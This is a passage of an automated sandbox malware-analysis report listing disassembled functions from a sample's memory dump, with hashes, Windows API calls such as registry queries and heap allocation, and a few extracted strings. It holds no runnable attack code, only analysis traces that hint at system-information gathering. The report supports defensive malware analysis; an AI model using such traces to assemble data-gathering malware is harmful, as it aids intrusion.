                          • Instruction ID: 3365a4a921ca6ff005a2c3cb457e9adbd1f1d857e82b99a5468be4a1f84706cd
                          • Opcode Fuzzy Hash: 794044fc6a7125fcce5017b9b5ac6504fde8e5b7d80fa873599a3035f6f0f460
                          • Instruction Fuzzy Hash: CD01B1B1A05618ABDB15DF98DC49FAEB7B8FB44710F00422AFA06E7380DB746D0087A5
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00F2D960,00000000,00020119,?), ref: 003BD7F5
                          • RegQueryValueExA.ADVAPI32(?,00F2ECF8,00000000,00000000,00000000,000000FF), ref: 003BD819
                          • RegCloseKey.ADVAPI32(?), ref: 003BD823
                          • lstrcat.KERNEL32(?,00000000), ref: 003BD848
                          • lstrcat.KERNEL32(?,00F2EDD0), ref: 003BD85C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: 35690128860f02f35133167273acebda0c454419f6726a3250b4a2e48c7408fb
                          • Instruction ID: d8240f3603093624002092a5f822ee65760bc6a3c7e1961382df943175ede118
                          • Opcode Fuzzy Hash: 35690128860f02f35133167273acebda0c454419f6726a3250b4a2e48c7408fb
                          • Instruction Fuzzy Hash: DC416575A1010CAFCB65EF68EC86FDE77B4EB55304F004066B6099B661EF30AE498F91
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 003B7F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B7F60
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003B7FA5
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003B7FD3
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003B8007
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 19cb5b4ce8f6f6256d5c95a568f410ba22f720fc6badcf37d96da304d88b2d0f
                          • Instruction ID: 98f10348c52882ae44a9ea25a6851095f134ede4271bed61d2a64ab83e6923f8
                          • Opcode Fuzzy Hash: 19cb5b4ce8f6f6256d5c95a568f410ba22f720fc6badcf37d96da304d88b2d0f
                          • Instruction Fuzzy Hash: 5D41B230504116DFCB22DF58D484EEE77B8FF94344B110099E906EB751EB70EA65CB91
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 003B80BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B80EA
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003B8102
                          • lstrlen.KERNEL32(00000000), ref: 003B8140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B816F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: c6030bbbe314ede6c7487f543d7cd4ad312fb75bbf428031f7d474d0737105d1
                          • Instruction ID: c349d157447ad765aec9c271dbaa89f546eaed74261be5a2b6d6134221363888
                          • Opcode Fuzzy Hash: c6030bbbe314ede6c7487f543d7cd4ad312fb75bbf428031f7d474d0737105d1
                          • Instruction Fuzzy Hash: 07419C75A01106ABCB22EF6CD948BEABBF8EF44744F11801DA94AD7614EF30D946CB90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C3166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C316D
                          • RegOpenKeyExA.ADVAPI32(80000002,00F1B9E0,00000000,00020119,?), ref: 003C318C
                          • RegQueryValueExA.ADVAPI32(?,00F2DB60,00000000,00000000,00000000,000000FF), ref: 003C31A7
                          • RegCloseKey.ADVAPI32(?), ref: 003C31B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: bdce97dd0bc55eb946be814c63f55e72626b31143d8e3ca32728633cd36c460a
                          • Instruction ID: 44cefacba30b8f5224f42a931e8aff94361afa918c2c3d07401da217509f8c87
                          • Opcode Fuzzy Hash: bdce97dd0bc55eb946be814c63f55e72626b31143d8e3ca32728633cd36c460a
                          • Instruction Fuzzy Hash: 24113076A41205AFD720DB94EC49FBBB7BCE744711F00411BFA05D3780DB75590487A1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 1c8a84d22a10cebf6fdc7c6d3ffffcd452b474a7546f0bb48cf9a640861f8c2a
                          • Instruction ID: 7d518d458d5d57f4a1567170459217ccbe169b569627c46bf667cb9714126439
                          • Opcode Fuzzy Hash: 1c8a84d22a10cebf6fdc7c6d3ffffcd452b474a7546f0bb48cf9a640861f8c2a
                          • Instruction Fuzzy Hash: F541E67050479CAEDB229B248C89FFB7BFC9B45704F1948EDE9C6C6182E2719E458F20
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003A8996
                            • Part of subcall function 003CA1C0: std::exception::exception.LIBCMT ref: 003CA1D5
                            • Part of subcall function 003CA1C0: std::exception::exception.LIBCMT ref: 003CA1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 003A89CD
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA188
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: be23203c31aa878bda7effb2749846524dd418e2a752d1619fe844424a1b7f00
                          • Instruction ID: ab6f294821f1f4516f4056395a8e64c80d4985df012494e1b2c0e0fd6a93fd93
                          • Opcode Fuzzy Hash: be23203c31aa878bda7effb2749846524dd418e2a752d1619fe844424a1b7f00
                          • Instruction Fuzzy Hash: DE21E5733006508BC722DB5CE840A6AF7A9DFA27A1B150A3FF182CB281DB71DC41C3A5
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003A8883
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA188
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 88efedb43114f4c39f0cec306d96e024b2ce36c4ca6ab497cd9bb7a26c187bac
                          • Instruction ID: 085686569cf701ecbbf3527fde699c4a91dd16e26dc0f146c1cf73b9aaaae2cb
                          • Opcode Fuzzy Hash: 88efedb43114f4c39f0cec306d96e024b2ce36c4ca6ab497cd9bb7a26c187bac
                          • Instruction Fuzzy Hash: 3431BBB5E005199FCB09DF58C891AAEBBB6EB89350F14C269E915EF344DB30AD01CBD1
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C5922
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA188
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C5935
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: 31591294e376b63b9f228590d8d658965982774c12a25b2f3cb86ecc1e09aa72
                          • Instruction ID: 714d3f0871b7fca094d0cd9fa2b262cbfae5ee96a963f2cbe686aa1769c2a770
                          • Opcode Fuzzy Hash: 31591294e376b63b9f228590d8d658965982774c12a25b2f3cb86ecc1e09aa72
                          • Instruction Fuzzy Hash: 4F113031318B40CBC7238B2CE800F19B7E5ABA2761F250A9EE0D1CB695D771EC81C7A5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,003CA430,000000FF), ref: 003C3D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C3D27
                          • wsprintfA.USER32 ref: 003C3D37
                            • Part of subcall function 003C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003C71FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: f8d5771695f54a3e82fddb54cf191e20c78b489ceb1abd3589bddb5995600c9a
                          • Instruction ID: 4f5632998549ed6e9afdc33ee3dbd1c870272b39c954c1ad3afa91acad00b504
                          • Opcode Fuzzy Hash: f8d5771695f54a3e82fddb54cf191e20c78b489ceb1abd3589bddb5995600c9a
                          • Instruction Fuzzy Hash: A401AD71642604BFE7209B54AC0EF6ABB68FB55B62F004117FA05D72D0D6B41D04DBA2
                          APIs
                          • __getptd.LIBCMT ref: 003C9279
                            • Part of subcall function 003C87FF: __amsg_exit.LIBCMT ref: 003C880F
                          • __amsg_exit.LIBCMT ref: 003C9299
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit$__getptd
                          • String ID: Xu=$Xu=
                          • API String ID: 441000147-3369541160
                          • Opcode ID: 1d30c1069b51a6b3d83af0881e69368d4775e4558203dc5c46163bf17658d43c
                          • Instruction ID: 9f2bb152c2d96b70711cc89bcb495389e998128c6fb4732c92f525bfafa52203
                          • Opcode Fuzzy Hash: 1d30c1069b51a6b3d83af0881e69368d4775e4558203dc5c46163bf17658d43c
                          • Instruction Fuzzy Hash: F6018433906725ABD623AB69A80AF9DB3546F01B10F57040FE884EB690DB346D41CBD5
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003A8737
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA188
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
